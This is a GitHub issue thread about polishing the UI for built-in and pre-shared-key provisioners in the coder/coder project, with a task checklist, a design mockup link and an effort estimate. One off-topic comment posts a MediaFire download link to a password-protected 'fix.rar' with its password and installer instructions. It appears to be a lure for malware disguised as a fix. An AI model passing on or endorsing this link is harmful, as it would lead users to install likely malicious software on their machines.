### ISSUE TITLE
ui(provisioners): polish ui for built-in and psk provisioners

### ISSUE THREAD

**Issue by aslilac** [coder/coder#14442]
Given that these can only be added to the default org, we can probably put off some of the "polish" for these kinds until after the work for keyed multi-org capable provisioners is all done and feeling good. We should show them in the UI, and indicate what type they are, but other things can wait until later, which is what this issue tracks.

- [x] Help tooltips describing the type of the provisioner and linking to the docs
- [x] "Built-in" version indicator for built-in provisioners

**Comment by aslilac** [comment]
<img width="1280" alt="Provisioners View – Built-in + PSK" src="https://github.com/user-attachments/assets/ef962ab9-a6a5-45dd-b556-802122732bc7">

https://www.figma.com/design/sruiQdZ5R73EBiaxqrVGxX/Provisioners?node-id=3010-286&t=0qcIIgUtLV1YesAR-1

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kira-Pilot** [comment]
Est: S
